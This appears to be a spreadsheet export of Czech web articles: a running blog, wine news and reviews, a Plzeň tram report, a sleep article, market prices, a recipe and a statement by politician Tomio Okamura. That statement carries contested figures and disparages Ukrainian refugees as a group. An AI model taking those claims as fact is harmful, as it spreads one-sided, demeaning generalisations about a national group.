jen o proběhnutí, ale závodnická duše se nemalou mírou hlásí o své slovo. Hlavně trapně nezakopnout o nějaký kořen nebo nevhodně nedoskočit do nějaké „škarpy“. Po vytknutém kotníku určitě netoužím. I tak to dále ženu, jako by se snad jednalo o nějaký velice významný závod. Adrenalin rychlého běhu v pestrém terénu, kdy nemám celou, ne příliš širokou, cestičku jen sám pro sebe po chvíli výrazně zpomalují padlé kmeny stromů. Jsem ve svém živlu, takováto překvapení se mi líbí – pokud zrovna nespěchám nebo již není příliš šero. Proběhnutí má mít celkem něco přes 10 kilometrů a já vím, že jsem POŘÁDNĚ „nasadil“. Svým způsobem bych už byl rád, kdybych viděl bunkry, cíl tohoto výběhu a nebo plánovanou/neplánovanou zastávku. Nemusím si to dlouho přát, po poslední, nejkrásnější prolézačce/obcházečce padlých stromů se již napojujeme na pevnější lesní a později spíš polní cestu a v dálce už vidím „čelo pelotonu“, které má pauzu. Někteří si na tomto krátkém úseku dávají svůj soukromý souboj s rychlostí do mírného stoupání a někteří i s okolními běžci. Foto: TomášNejedlý Už před sebou, na druhé straně cesty vidím bunkr, ale zdá se mi, že JAROŠ to není. Jdu ho tedy prozkoumat, minimálně alespoň jeho okolí. Netrvá dlouho a už si zase vzpomínám. Jsem už jen kousek od hlavního bodu „mnohahlavé“ akce. Stojím u bunkru, který je na linii umístěn západněji a je sousedem prvně jmenovaného. Jmenuje se František. Nemohu se příliš kochat, protože jsem se dostal na mou nejběžnější pozici, tedy „na chvost“. Myslel jsem si, že jsem zde pobyl jen pár minut, ale vše vypadá jako bych už skutečně byl na úplném konci. Nemíním to tak dále nechat a necelých 800 metrů k JAROŠOVI pojímám jako „sprinterskou“ vsuvku. Minimálně se musím dostat před běžkyni se kterou jsem si už kdysi dávno sám pro sebe vyhlásil „nepsané soupeření“. Už máme za sebou všichni minimálně 7 kilometrů a jsme tedy patrně už všichni dobře „rozběháni“. Už se začíná výrazněji stmívat a tak si na pár stech metrech po hlavní silnici musím dávat více bacha, ale po odbočce doleva již mohu plně popustit uzdu své běžecké vášni. Netrvá to dlouho a opět předbíhám prvního, druhého, třetího… Následuje ostrá zatáčka doprava do menšího kopečku a zde se mi opět daří získat pár drahocenných pozic. Stoupání se zmírňuje, ale přichází „vyhazující“ odbočka doleva už jen pár desítek metrů před bunkrem Jaroš. Už se setmělo a tak je velice dobře, že osvětlen halogenem. Podobně jako v jiných závodech získávám vítězství nad běžkyní z Opavy v posledních metrech před cílovou rovinkou. Inu postupem času se naše farma zlepšuje a není dobré usnout na vavřínech…:-) Foto: TomášNejedlý Přichází nečekané zpestření a tím je skutečná „žranice“. Zatím jsem nezažil mnoho jiných akci, kde by byly „nutné drobnosti“ dovedeny až k takové dokonalosti. Sám si už ani nevzpomenu, co vše jsme měli na výběr. Velice zábavný byl i pohled na běžce, který možná celou akci pojal spíš jako večeři a zvolil naprosto strategické místo, aby měl skoro všechno co nejblíž. Pro zásoby ale ani tahle příhoda neměla negativní vliv. Doplnění tekutin přišlo velice vhod a mlsání všeho možného i nemožného se mi také líbilo. Následovala prohlídka bunkru, kde se toho mnoho od mé poslední návštěvy před spousty let, tehdy ještě na kole, změnilo. Velice se rozrostla „radiosekce“, ale také se podařilo zprovoznit agregát, který dodával energii pro celou osádku. Když „najel“, tak to také všichni zcela jednoznačně poznali. Strojařská část mé duše tomu nemohla chybět a když jsem stál před strojem, tak to byl pořádný rambajs. Prohlídka bunkru by vydala na mnoho stránek textu, ale určitě bude pro každého lepší, když místo navštíví [17] – [18]. Ač jsem si myslel, že jsem bunkr jen proletěl, tak po návratu ven už byla černočerná tma. Svítil jen reflektor a „hvězdičky“ v údolí. Čelovky, co kdyby, se nyní více než sešly. Návštěva Jaroše byla pro mě velice hezkým zpestřením proběhnutí a také vzpomínkami na setkání před mnoha a mnoha lety, kdy jsem na kole odjížděl už také za spolehlivé tmy. A přitom jak tehdy, tak i nyní by šlo ještě spoustu věcí probrat. Nyní se skupina také rozbíhá, spíš pomaleji než rychleji a opět obsazuji své místo na konci. Přede mnou vidím dlouhou, pohybující se řádku světýlek mířících k centru Hlučína , přesněji k železniční stanici. Každý už asi tento úsek považuje jen za kousek (ve sktutečnosti tomu až tak není – jedná se o menší polovinu vzdálenosti) a tak po seběhnutí loukou, kde je třeba více dávat pozor již na lépe osvětlených cestičkách míří Darkovičkami (neptejte se mě kudy přesně - netuším) v mnohem větším tempu dále. V jednom těžko popsatelném místě přecházíme hlavní cestu na cyklostezku po které by se dalo běžet ještě rychleji, ale nejsem asi jediný komu už dochází síly. Taktéž není osvětlená a tak si každý asi podvědomě dává větší pozor na „neviditelné“ díry v asfaltu. Cesta se tady táhne, ač je mírně z kopce. Konečně už jsme na hranici Hlučína a město je již mnohem lépe osvětleno. Nikdo jej nevyhlásil, ale i tak si asi většina dává NEPSANÝ ZÁVOD DO CÍLE, kterým je hlučínská železniční stanice. To se to běží, když člověk vidí pod nohy. Opět se najdeme takoví, že je nám chodník příliš úzký. Závod je závod… Jen matně tuším, že zhruba stejnými místy jsme vybíhali opačným směrem večer ještě za světla. Nechávám se tak unést atmosférou, že to netrvá dlouho a už jsme prakticky v cíli. Na nádraží vbíháme tak rychle, že zatáčku před podchodem, přístřeškem, tunelem nebo co to je, tak tak vybírám. Nečekaná cílová rovinka DOLŮ. Po prokličkování kolejemi, vydýchání se a počkání na poslední, se rozloučíme. Někteří odjíždí a mě čeká cesta k autobusovému nádraží, které se mi po chvíli daří i najít. Autobus 75 odjíždí za chvíli a tak ani nemusím dlouho čekat. Foto: TomášNejedlý Nevšední čtvrteční akce se mi nadmíru líbila, stejně jako spousta dalších závodů pořádaných BK Ludgeřovice. Nejsem asi jediný, který netuší čím to je, že jejich akce mají takový „drajv“. A asi je to tak dobře. DOPORUČENÁ A POUŽITÁ LITERATURA A ZDROJE: [0] https://www.youtube.com/watch?v=k6vJW7saA7s … Bunkr run 2024. [1] https://www.bkludgerovice.cz/o-nas/bunkr-run/ [2] https://www.bkludgerovice.cz/ [3] https://www.youtube.com/watch?v=qhKfgeiro2o … Zimní běh Hlučín 2024... [4] https://www.youtube.com/watch?v=2W8qdGQxfdU [5] https://www.youtube.com/watch?v=wubG2fAzulU … Celý závod „Zimní běh Hlučín 2024“. [6] https://www.youtube.com/watch?v=hbbkJFqSHWQ … Ludgeřovický kros 2024. Foto: TomášNejedlý [13] https://www.youtube.com/watch?v=FaIPR6LYXPs … Jeskyně Netopýrka, pod traverzou je asi 2,5 metru hluboká vertikála a úzká zalomená plazivka, kde je třeba si dobře promyslet způsob postupu níž (to šlo úplně lehce), ale hlavně návratu – to již taková sranda nebyla – o nohy se moc opřít nedalo, velmi svislé a mělké výstupky na stěnách strašně klouzaly, i když stěny byly zcela suché. Díky moc za smyčky starého lana, které sice vypadalo kdo ví jak, ale v tom okamžiku bylo zlaté. Jeskyňáři si zde dávají nepsanou „soutěž“ se vstupem do jeskyně, nabráním vzorku vody a návratem zpět za určitý čas…:-) [14] https://www.youtube.com/watch?v=0wkpmRumCmU … Jeskyně Malčina. [15] https://www.youtube.com/watch?v=QFdm2MpKDVg [16] Ponorná Říčka a její přítoky – RNDr. Jan Himmel a spol, ČSS 6-11 Královopolská, 2013, 500 ks. [17] https://www.bunkry.cz/muzeum/mo21 … Pevnost Jaroš. [18] https://www.opevneni-slezska.cz/cs/detail/pechotni-srub-u-jarose-4 ----------------------------------------------------------------------------------------------------------- [19] https://www.youtube.com/watch?v=605ZtjgGzQs … Rothschildovy studny u Hlučína . Foto: TomášNejedlý [20] https://www.youtube.com/watch?v=bOMlbMkx1R4 … Běžecko-turistická procházka k Rothschildovým studnám u Hlučína , cca 27 km, 4 hod 44 min. Autor: Tomáš Nejedlý Autor person Tomáš Nejedlý</t>
  </si>
  <si>
    <t>2500</t>
  </si>
  <si>
    <t>20241201_65_3477844371_23f9872b7b679c2a6644.html</t>
  </si>
  <si>
    <t>23f9872b7b679c2a6644</t>
  </si>
  <si>
    <t>Světová produkce vína bude letos asi nejnižší od roku 1961, odhaduje organizace</t>
  </si>
  <si>
    <t>Světová produkce vína bude letos asi nejnižší od roku 1961, odhaduje organizace 1.12.2024 16:41 Světová produkce vína se v letošním roce patrně opět sníží a bude nejslabší od roku 1961. Hlavní příčinou je špatné počasí. Uvedla to Mezinárodní organizace pro révu a víno (OIV). Podle jejího odhadu by se produkce měla pohybovat v rozmezí 227 milionů až 235 milionů hektolitrů, což bude zhruba o dvě procenta méně než loni, informuje agentura AFP . Paříž / Brno 1. prosince ( ČTK ) - Odhad vychází z údajů o sklizni ve 29 zemích, které se na loňské produkci podílely 85 procenty. V roce 1961 produkce činila 220 milionů hektolitrů. Proti průměru za posledních deset let bude letošní produkce nižší zhruba o 13 procent. Český Svaz vinařů zatím přesné údaje o sklizni hroznů nemá, v současnosti sbírá informace od vinařů. "Zatím můžeme jen shrnout to, co jsme avizovali na konci vinobraní. Jarní mrazy nejvíce postihly vinohrady v Čechách , ty byly prakticky vyřazené, sklizeň byla letos přibližně o tři až čtyři týdny dřív," uvedl prezident Svazu vinařů Martin Chlad. Podle předběžných odhadů byl letos výnos za celé Česko podprůměrný. Podle OIV produkce v Česku letos klesne o 28 procent na 0,3 milionu hektolitrů. Ve srovnání s průměrem za posledních pět let bude nižší o 38 procent. "Klimatické problémy na obou polokoulích jsou opět hlavní příčinou sníženého objemu světové produkce," uvedla OIV. Stejně jako v roce 2023 mají na globální produkci výrazný vliv extrémní nebo atypické meteorologické jevy. Produkci vinic ovlivňují hlavně brzké mrazy, silné deště a dlouhotrvající sucho. Ve většině regionů produkce klesla. Produkce ve Francii , která byla loni největším producentem vína , se letos sníží o 23 procent. To je nejvyšší pokles v odvětví. Produkce v Itálii se ale mírně zotavila, a země tak znovu předstihla Francii a stane se letos největším producentem. Produkce Itálie má letos činit zhruba 41 milionů hektolitrů a Francie 36,9 milionu hektolitrů. Podle OIV pouze malá skupina regionů měla příznivější klimatického podmínky a podařilo se jim dosáhnout průměrného nebo nadprůměrného objemu produkce. Patřily mezi ně Spojené státy a několik východoevropských zemí, včetně Maďarska , Gruzie a Moldavska . Na jižní polokouli bude objem produkce kvůli nepříznivému počasí nejnižší za posledních 20 let. V minulosti měl tento region tendenci vyvažovat celkovou bilanci, když byla na severní polokouli produkce nižší, upozornil generální ředitel OIV John Baker. Objem světové produkce vína v posledních deseti letech: Rok Objem produkce vína (v milionech hektolitrů) 2024</t>
  </si>
  <si>
    <t>189</t>
  </si>
  <si>
    <t>20241201_66_3477809884_3278050eafb05e9884b1.html</t>
  </si>
  <si>
    <t>3278050eafb05e9884b1</t>
  </si>
  <si>
    <t>Víno Chardonnay 2023, pozdní sběr, Víno Hradil</t>
  </si>
  <si>
    <t>Víno Chardonnay 2023, pozdní sběr, Víno Hradil /100 18. 6. 2024 „8. mezi Veltlínskými zelenými v květnovém kole našich dálkových degustací. Blíže o pravidlech a možnosti účasti přes můj profil. V pořadích jednotlivých degustátorů se umístilo následovně: 7,6,8,5,7,8,4.“ /100 30. 12. 2023 „Barva prusvitně povidlová, Ve vůni dominuje dřevěný sud. V chuti je na začátku smetanový nádech švestiček později přechází do jemných pepřových tříslovin.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_67_3477758322_53424246a72d133fe3a2.html</t>
  </si>
  <si>
    <t>53424246a72d133fe3a2</t>
  </si>
  <si>
    <t>Víno Svatovavřinecké Barrique 2022, moravské zemské víno, Rodinné vinařství M&amp;amp;M Rusňák</t>
  </si>
  <si>
    <t>Víno Svatovavřinecké Barrique 2022, moravské zemské víno , Rodinné vinařství M&amp;amp;M Rusňák /100 24. 11. 2024 „Čirá, čistá, bledě zelenožlutá barva, se stříbřitými odlesky a vysokou viskozitou. Plná, čistá, intenzivní, oblá a zralá, jemně kořenitá, medově nasládlá vůně, pojí kvetoucí sad a rozkvetlou louku s jarním medem a letním zralým až přezrálým ovocem, připomínajícím maliny, rybízy a mirabelky. Harmonická, středně plná až plnější, hebká, sametová, velmi příjemná chuť s jemným zbytkovým cukrem a ovocem z vůně, v druhé vlně pak s lehkým nádechem sušených bylin a jemného koření a s velmi příjemnou kyselinkou, evokující limetky. Dlouhý příjemně kořenitý závěr. Velmi přitažlivé, nádherně pitelné víno .“ /100 16. 11. 2024 „Čiré, křišťálově čisté víno bledě žlutozelené barvy, se stříbřitými odlesky a výraznou viskozitou. Příjemná, čistá, středně intenzivní, jemně kořenitá, svěží herbální vůně jarní louky s kvetoucími i sušenými bylinami, jarním medem, s lehkými svěžími podtóny bílého rybízu a angreštu. Velmi příjemně pitelná, svěží, hladká a vláčná chuť pokračuje v tónině buketu: jarní louka s medem a příjemnou kořenitostí, se svěží příchutí bílého rybízu i angreštu. Dlouhý, osvěžující závěr. Výborné, nádherně vyvážené, krásně pitelné a neunavující víno .“ /100 8. 12. 2024 „Křišťálově čiré víno , velmi světle žluté barvy se slámovými odlesky a středně dobrou viskozitou. Harmonická, čistá, velmi decentní jemná vůně přináší aroma postupně rozkvétající louky s medem či květovým nektarem, pak přichází lískový oříšek a velmi jemný nádech ušlechtilého dřeva i koření. Bohatá, středně plná, přitom ne však výrazná suchá chuť, pokračuje v jemnosti vůně, k tónům z buketu se přidává zelené jablko, lehce i citrusy a jemný nádech koření, připomínající pobyt v barikovém sudu. Citrusová kyselinka se snoubí se sladkým tříslem a medem v delším svěžím závěru.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_68_3482576846_ac2be5a1a4474fa8c3df.html</t>
  </si>
  <si>
    <t>ac2be5a1a4474fa8c3df</t>
  </si>
  <si>
    <t>Vánoční tramvaj v Plzni opět vyráží do ulic - FOTKY</t>
  </si>
  <si>
    <t>Vánoční tramvaj v Plzni opět vyráží do ulic - FOTKY Plzeň se během adventu tradičně mění v pohádkové město plné světel, vůní svařeného vína a melodií vánočních koled. K jedinečným symbolům této sváteční atmosféry patří vánoční tramvaj, která i letos ozdobí ulice města a přinese radost cestujícím i kolemjdoucím. Tato tradice spojuje místní obyvatele i návštěvníky a přináší kouzlo Vánoc přímo na kolejích. První jízdy již 1. prosince Slavnostní premiéra letošní vánoční tramvaje se uskuteční v neděli 1. prosince. Tramvaj bude přistavena od 16.20 hodin do točny U Zvonu, kde si zájemci budou moci tramvaj prohlédnout zvenčí i zevnitř a pořídit si památeční fotografie. Krátce před 17. hodinou se tramvaj přesune bez cestujících do zastávky U Synagogy, odkud vyrazí na okružní jízdy po trase U Synagogy – Náměstí Republiky – Anglické nábřeží a zpět. „Nástup a výstup bude možný pouze v zastávce U Synagogy, a kromě vánočně vyzdobeného interiéru jsme pro děti připravili i drobné vánoční dárky,“ uvedl Michael Sinkule, člen představenstva dopravních podniků města Plzně . První odjezd vánoční tramvaje z U Synagogy proběhne v 17.05 hodin, následovat budou další jízdy v intervalech 15 minut až do 18.50 hodin, kdy poslední jízda zamíří z Anglického nábřeží po trase linky 1 až do vozovny Slovany. Vánoční tramvaj na pravidelných linkách Od pondělí 2. prosince bude vánoční tramvaj jezdit na pravidelných linkách. V pracovních dnech bude zařazena na linku 2, o víkendech na linku 4. Přesný jízdní řád bude dostupný na webu Plzeňských městských dopravních podniků a sociálních sítích. „Vánoční tramvaj jsme letos ozdobili novou výzdobou a připravili několik překvapení uvnitř vozu. Udělá radost nejen dětem, ale určitě i dospělým. Osobně mám z naší tramvaje již historického typu KT8D5.RN2P velkou radost,“ dodává Sinkule. Evropské uznání Plzeňská vánoční tramvaj se každoročně těší velké oblibě mezi cestujícími i fotografy. V lednu 2024 získala stříbrné místo v anketě o nejkrásnější vánoční tramvaj mezi 28 evropskými městy , čímž opět potvrdila svůj status unikátu nejen na české scéně. Adventní atmosféra na kolejích Vánoční tramvaj se stala neodmyslitelnou součástí plzeňského adventu. Tisíce světýlek, tematické dekorace a jedinečná sváteční atmosféra lákají nejen místní obyvatele, ale i turisty. Nenechte si ujít příležitost zažít kouzlo Vánoc na kolejích – zatím si prohlédněte fotografie, zachycující tramvaj ve vozovně, kde čekala na svou letošní první cestu. foto: Michael Sinkule Autor: KR || QAP.cz - Vaše internetové noviny</t>
  </si>
  <si>
    <t>3510</t>
  </si>
  <si>
    <t>20241201_69_3477706608_8bb84c337da82666dc32.html</t>
  </si>
  <si>
    <t>8bb84c337da82666dc32</t>
  </si>
  <si>
    <t>Okamura: Na Ukrajince doplácíme na úkor našich občanů</t>
  </si>
  <si>
    <t>Okamura : Na Ukrajince doplácíme na úkor našich občanů Sdílejte článek: PZ Šéf SPD Tomio Okamura nesouhlasí s tvrzením vlády Petra Fialy ohledně toho, že jsou Ukrajinci pro Českou republiku finančním přínosem. Rozporuje dávky a na číslech vysvětluje, kde podle něj vláda neříká lidem pravdu. Finanční přínos, který mají pro Českou republiku uprchlíci z Ukrajiny s dočasnou ochranou, hájil ve Sněmovně premiér a předseda ODS Petr Fiala i lidovecký ministr práce a sociálních věcí Marian Jurečka . Podle nich přinášejí Ukrajinci do státního rozpočtu více peněz díky tomu, že jsou zaměstnáni a že vláda zvládla jejich integraci. S tím ale ostře nesouhlasí šéf SPD Tomio Okamura , který se na čísla podíval detailněji. „Dávky v Česku dostává v současnosti přes 50 tisíc ukrajinských domácností, čili k tomu ještě násobně více Ukrajinců. Proč ale dostávají dávky, když Fialova vláda tvrdí, že tady Ukrajinci pracují a jsou prý finančním přínosem? Skutečnost je totiž úplně jiná – Fialova vláda již vydala na Ukrajince astronomických 122 miliard korun, zatímco si vláda vycucala z prstu, že přínos Ukrajinců na odvodech je pouze 5,7 miliardy a to do této částky vláda započítala dokonce i jejich útraty za alkohol (!!). Na Ukrajince tedy těžce doplácíme na úkor našich občanů. Kvůli Fialově vládě. Taková je realita. Konkrétně například v srpnu dávku dostalo 51 400 ukrajinských domácností . Vyplývá to z měsíčních zpráv Ministerstva práce a sociálních věcí ČR o vyplacených dávkách. Údaje o poskytnuté podpoře za září a říjen resort zatím neposkytl. Podle hnutí SPD by se měli ukrajinští uprchlíci vrátit domů a měla by se zahájit mírová jednání. Hnutí SPD jasně říká: Už ani halíř Ukrajincům! Nula! Peníze českým občanům, to je jasná pozice SPD . Pro nás je na prvním místě český občan. Hnutí SPD neodmítá soucit, který byl v prvotní fázi v rámci možností potřeba, ale posíláním peněz Ukrajincům a ukrajinské vládě na zbraně se jen prodlužuje válka a Ukrajinci nejsou motivováni, aby tlačili na svou vládu, aby ukončila konflikt a ukrajinská vláda není motivována k jednání o míru. Ani samotní Ukrajinci již nechtějí bojovat a tři čtvrtě milionu Ukrajinců v bojeschopném věku podléhající branné povinnosti dezertovalo do Evropy a vyhýbá se branné povinnosti. A naše země se raketově zadlužuje, přitom peníze mnohdy chybí českým občanům! Vláda poslala Ukrajincům a Ukrajině dosud z našich peněz celkem 122 miliard korun. Oproti tomu ministr Jurečka z KDU-ČSL si najednou vymyslel číslo, že Ukrajinci prý přinesli do našeho rozpočtu na odvodech 5,7 miliardy korun, aby obhajoval Ukrajince proti našim občanům. Když jsem se o to jeho číslo zajímali hlouběji, tak se ukázalo, že do něj započítal i útraty Ukrajinců za alkohol , přesněji kolik za tyto útraty stát získal za spotřební daň na alkohol , a naopak úplně vynechal například informaci, kolik čerpají Ukrajinci u nás za zdravotnictví či školství, což jsou miliardy. Čili, Fialova vláda považuje za jejich úspěch například to, že tady Ukrajinci hodně chlastají a dělají pak bordel. Pro více než polovinu Čechů představují Ukrajinci problém. I podle průzkumu CVVM z dubna si většina lidí myslí, že Česko přijalo více uprchlíků z Ukrajiny , než je schopno zvládnout. Tak uvažuje 58 procent lidí. Zhruba podle třetiny je situace přiměřená a pět procent lidí říká, že Česko přijalo méně uprchlíků, než by mohlo zvládnout. Kriminalita Ukrajinců extrémně narostla o 45 procent a roste vliv ukrajinské mafie . Obecná trestná činnost Ukrajinců se loni zvýšila o 45%, uvádí zpráva Nejvyššího státního zastupitelství ( NSZ ),“ napsal k dávkám pro Ukrajince na svém facebooku Okamura . prvnizpravy.cz About Latest Posts Redakce Sdílejte článek: ( 18 votes, average: 4,78 out of 5) Loading... Autor: Redakce</t>
  </si>
  <si>
    <t>10870</t>
  </si>
  <si>
    <t>45210</t>
  </si>
  <si>
    <t>20241201_7_3479467194_dfbf3936336086417fd1.html</t>
  </si>
  <si>
    <t>dfbf3936336086417fd1</t>
  </si>
  <si>
    <t>Jak může kvalitní spánek transformovat naše zdraví a pohodu</t>
  </si>
  <si>
    <t>Jak může kvalitní spánek transformovat naše zdraví a pohodu Jooka Crew 1. 12. 2024 3 min read Kvalitní spánek hraje klíčovou roli v celkovém zdraví člověka, což je dnes čím dál víc zřejmé. Mnoho lidí si však neuvědomuje, jak hluboce ovlivňuje naše fyzické i psychické zdraví. Tento článek se zaměřuje na význam spánku pro naše životy, představí překvapivý fakt o jeho vlivu a nabídne několik doporučení, jak dosáhnout lepšího nočního odpočinku. Spánek jako regenerativní proces Během nočního odpočinku prochází naše tělo složitými procesy, které jsou nezbytné pro regeneraci a udržení zdraví. Během spánku dochází k obnově svalů, reparametrizaci metabolismu a vyplavování toxických látek z mozku. Tento proces je natolik důležitý, že i mírný nedostatek spánku může vést k negativním důsledkům, jako jsou oslabený imunitní systém, zvýšené riziko obezity a dokonce i kardiovaskulárních onemocnění. Zajímavým faktem je, že nedostatek spánku může vyvolat stejné neurologické poruchy jako dlouhodobé užívání alkoholu , což mnohé lidi překvapí a přiměje je zamyslet se nad svými nočními zvyky. Psychické zdraví a spánek Psychické zdraví je další oblastí, která je spánkem hluboce ovlivněna. Kvalitní spánek je zásadní pro emocionální stabilitu a kognitivní funkce. Špatné spánkové návyky často vedou k zvýšené úrovni úzkosti a deprese, což může vytvořit začarovaný kruh, kdy stres a strach z nespavosti dále zhoršují kvalitu spánku. Ačkoliv je pro některé lidi obtížné tento cyklus přerušit, existuje řada metod, jak si zlepšit spánkovou hygienu. Vytvoření pravidelného spánkového plánu, snížení expozice modrému světlu před spaním a relaxační cvičení mohou mít pozitivní vliv. Životní styl a spánek Způsob života a typu činností, kterým se věnujeme během dne, ovlivňují kvalitu našeho spánku více, než si většina lidí uvědomuje. Tělesná aktivita, kvalitní strava a psychická pohoda mají zásadní vliv na to, jak spíme. Aktivní životní styl, který zahrnuje pravidelné cvičení, přináší nejen fyzické benefity, ale také podporuje lepší spánek. Na druhou stranu, nadměrná konzumace stimulujících látek, jako je kofein nebo nikotin, může negativně ovlivnit naši schopnost usnout a kvalitu nočního odpočinku. Spánek není pouze pasivní činností, ale aktivním procesem, který má zásadní význam pro naše celkové zdraví. Uvědomění si jeho vlivu a posílení spánkových návyků může přinést výrazné zlepšení v mnoha oblastech života. Každý by měl mít na paměti, že lepší spánek znamená nejen lepší zdraví, ale i větší radost ze života. Jak se vám článek líbil? Autor: Jooka Crew</t>
  </si>
  <si>
    <t>20241201_70_3477834722_09d1732c0c444925698b.html</t>
  </si>
  <si>
    <t>09d1732c0c444925698b</t>
  </si>
  <si>
    <t>Hamburger i za 240. Za kolik se na trzích na Karlově náměstí najíte a napijete</t>
  </si>
  <si>
    <t>Hamburger i za 240. Za kolik se na trzích na Karlově náměstí najíte a napijete Město Kolín nechalo ve spolupráci se společností AVE pořídit a nazdobit hned pětici nových dřevěných stánků, které budou fungovat po celý advent. Své místo v nich našla Cukrárna Poctivka, ale také prodejci horkých alkoholických a nealkoholických nápojů, oříšků a dalších sladkých a slaných pochutin. Svůj pojízdný stánek ale na kolínském náměstí mají i Štrúdelník, Kofíkolka či Boss Burgers. Nechybí ani staročeský trdelník, langoš nebo klobása. play_fill Volný čas Oproti pražským trhům na Staroměstském náměstí lidé z Kolína o dost ušetří. Langoš si v Kolíně dají za 80 korun, v Praze i za 220. Malý svařák (0,2 l) vyjde od 40 do 60 korun., horká čokoláda (0,2 l) od 59 do 80 korun. Zákusky se dají pořídit od 30 do 70 korun, záleží na chuti, základní trdelník vychází na rovnou stovku. A komu by se zachtělo na štrúdl, za jeden kousek zaplatí mezi 29 a 49 korunami podle druhu. Na kolik vyjdou jednotlivé dobroty či nápoje zjistíte v přehledné tabulce. Nápoje Pivo (0,5 l) 40 až 65 Kč Káva 30 až 75 Kč Horká čokoláda (0,2 l) 59 až 80 Kč Horká čokoláda + alko (0,2 l) 90 Kč Horký mošt (0,2 l) 50 až 60 Kč Svařené víno (0,2 l) 40 až 65 Kč Horké alko (0,2 l) 60 Kč Dětský punč (0,2 l) 60 Kč Borůvkový svařák (0,2 l) 60 Kč Horká medovina (0,2 l) 60 až 120 Kč Čaj (0,2 l) 20 až 35 Kč Alko panák (0,04 l) 50 Kč Grog (0,2 l) 60 Kč Krakonošovy slzy (0,2 l) 60 Kč Horká griotka (0,2 l) 60 Kč Punč (0,2 l) 60 až 70 Kč Tekutý štrúdl (0,2 l) 60 Kč Jídlo Zákusek/dort 30 až 70 Kč Bubble vafle 80 až 150 Kč Štrúdl 29 až 49 Kč Sladké rohlíčky 35 Kč Caesar wrap 99 Kč Zelňák 45 Kč Trdelník 100 až 130 Kč Langoš 80 Kč Párek v rohlíku 40 Kč Sekaná v housce 80 Kč Smažák v housce 80 Kč Klobása 80 Kč Hot dog 120 až 140 Kč Hamburger 220 až 240 Kč Škvarková tyčinka 10 Kč Hranolky 50 Kč Kukuřice 50 Kč Palačinka 60 až 70 Kč Polévka 60 Kč Autor: Petr Procházka Autor person Petr Procházka Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20241201_71_3477740356_8e6871b49c8411dfc616.html</t>
  </si>
  <si>
    <t>8e6871b49c8411dfc616</t>
  </si>
  <si>
    <t>Vánoční marokánky od Mlékárny Valašské Meziříčí</t>
  </si>
  <si>
    <t>Vánoční marokánky od Mlékárny Valašské Meziříčí zveřejněno: od autora: Markéta Pavelková 2 min. čtení Med, datle, ořechy, kakao, vanilka … ano Vánoce jsou za dveřmi. A s nimi tvořivé pečení s Mlékárnou Valašské Meziříčí . Ta se snaží zakomponovat své výrobky do celé řady receptů a tipů do Vás. Čerstvá smetana z Valašska ke šlehání totiž pokrmy nebo pečené lahůdky dokonale zjemní a dodá jim tu správnou poctivou chuť. Nejinak tomu je i u Vánočního tipu v podobě Marokánek. Marokánky pochází původně ze severní Afriky . Jedná se o sladké placičky arabského původu. Dnes je ale zná celý svět. Rozhodně se jedná o zdravější variantu cukroví, protože jako sladidlo je v nich použit právě med a sušené či kandované ovoce. Výborně v Marokánkách chutnají také ořechy, které jsou rovně podobně jako med a ovoce našemu zdraví prospěšné. Tento druh cukroví nám dovoluje být navíc i kreativní, protože můžeme použít připravený recept nebo do něho dát to, co máme rádi my sami. Recept na Vánoční marokánky Ingredience: Čerstvá smetana z Valašska ke šlehání 150 g cukru 40 g másla 2 lžíce medu 200 g ořechů (mandle, pistácie, pekany) 60 g hladké mouky 200 g kandovaného ovoce 350-400 g hořké čokolády Postup: Do hrnce nalijeme smetanu, přidáme máslo a cukr, a za stálého míchání přivedeme k varu. Mícháme do zhoustnutí. Přidáme med, nasekané ořechy a kandované ovoce, vaříme na mírném plamenu další 3 minuty. Poté směs stáhneme z ohně a vmícháme mouku a promícháme. Na plech s pečicím papírem lžící tvarujeme marokánky, necháme mezi nimi rozestupy. Pečeme v troubě předehřáté na 200 °C 10–15 minut dozlatova. Po vychladnutí je potřeme rozpuštěnou čokoládou a necháme zatuhnout. Uložíme na chladné místo nebo rovnou servírujeme. Podle velikosti vyjde 20-25 ks. Doba přípravy je přibližně 60 minut. Mlékárna Valašské Meziříčí Vám přeje krásné a sladké Vánoce redaktorka, fotografka, recenzentka a webová degustátorka:) moto: "piš o tom cos zažil a ochutnal na vlastní kůži" Mohlo by se vám také líbit Chcete mít zde svoji reklamu? Více informací zde Soutěže zde se brzy objeví nějaká soutěž 🙂 Nedávné příspěvky Recenze: RECEPTY – spaghetti carbonara Spaghetti carbonara podle originálního receptu s originálními italskými ingrediencemi jsou naprosto famózní. Jak jsou jednoduché a rychlé na přípravu tak jsou skvělé chuťově. Žádný „český hybrid“ se smetanou nebo česnekem, to není prostě ono … Vytvořte si doma dokonalý originál. Když si je dáte kdekoli v Itálii například v Římě , v Bologni nebo v Janově , budou dle našeho originálního receptu chutnat vždy stejně dobře 🙂 Petr Pavelka - Krizovatkachuti.cz Recenze: pivo PROOVAN, recenze no:1 Chuť je výraznější chmelová než mají jiná nealka, na první dobrou se tedy chuťově více vymyká průměru. Jsou ale cítit i mírně kyselejší tóny citrusů nebo limetky v kombinaci s vyšší hořkostí to vůbec není nepříjemné. Mírná sladová chuť se dostaví až v závěru jako mírný ocásek chuti. Říz je příjemně vysoký, pitelnost přijatelná. Jedno z mála piv u kterého si po obědě lze dát ještě jedno. Petr Pavelka - Krizovatkachuti.cz hodnocení od Krizovatkachuti.cz 24. 5. 2024 The Glenlivet 12 single malt whisky nám na první ochutnání přišla bez výrazné vůně a se silnou alkoholovou chutí. Byla hodně „ostrá“ avšak po chvilce již se sametovějším ocáskem. Nicméně ochutnávka druhý den již byla příjemnější, avizované vanilkové tóny, oříšky či stopy čokoládovějších tónů se daly již zaznamenat stejně tak vůně byla již standardně příjemná s lehkými variacemi na vanilku. Za nás tedy 80% Petr Pavelka Archív článků Praha se stala na pár dní Paříží – nebo alespoň palác Žofín, který hostil legendární kabaret Crazy Horse Paris. Představení nabídlo nezapomenutelný zážitek plný vzrušení, […] zveřejněno: Med, datle, ořechy, kakao, vanilka … ano Vánoce jsou za dveřmi. A s nimi tvořivé pečení s Mlékárnou Valašské Meziříčí . Ta se snaží zakomponovat své výrobky do […] zveřejněno: Podzimní sychravé počasí přímo vybízí k mlsání, a co může být lepšího než domácí dezert přímo z vaší kuchyně? Karamelové řezy svým lahodným krémem, vůní máslového těsta a […] zveřejněno: Ovoce kaki Persimon Bouquet se stalo nedílnou součástí podzimních jídelníčků. Je známé pro svou sladkou 